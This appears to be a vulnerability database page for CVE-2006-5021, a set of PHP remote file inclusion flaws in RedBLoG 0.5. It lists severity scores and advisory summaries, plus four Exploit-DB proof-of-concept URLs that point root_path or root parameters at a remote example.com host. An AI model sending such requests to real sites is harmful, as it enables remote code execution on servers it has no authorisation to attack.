CVE-2006-5021
published 2006-09-27
Priority: P337 | critical | 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.12% (86.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root parameter in imgen.php, and the root_path parameter in (2) admin/config.php, (3) common.php, and (4) admin/index.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redblog | redblog | — | — |
CVSS provenance
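| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |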
VulDB
RedBLoG 0.5 imgen.php root_path file inclusion (BID-20115)
vuldb·2026-04-23·CVSS 9.8
CVE-2006-5021 [CRITICAL] RedBLoG 0.5 imgen.php root_path file inclusion (BID-20115)
A vulnerability, which was classified as critical, has been found in RedBLoG 0.5. This impacts an unknown function of the file imgen.php. Performing a manipulation of the argument root_path results in file inclusion.
This vulnerability is identified as CVE-2006-5021. The attack can be initiated remotely. There is not any exploit available.
GHSA
GHSA-6589-x6h4-26gm: Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0
ghsa_unreviewed·2022-05-01
CVE-2006-5021 [HIGH] CWE-94 GHSA-6589-x6h4-26gm: Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root parameter in imgen.php, and the root_path parameter in (2) admin/config.php, (3) common.php, and (4) admin/index.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
No detection rules found.
Exploit-DB
RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/admin/index.php?root_path=htpp://www.example.com
Exploit-DB
RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/imgen.php?root=http://www.example.com
Exploit-DB
RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/common.php?root_path=http://www.example.com
Exploit-DB
RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/admin/config.php?root_path=http://www.example.com
No writeups or analysis indexed.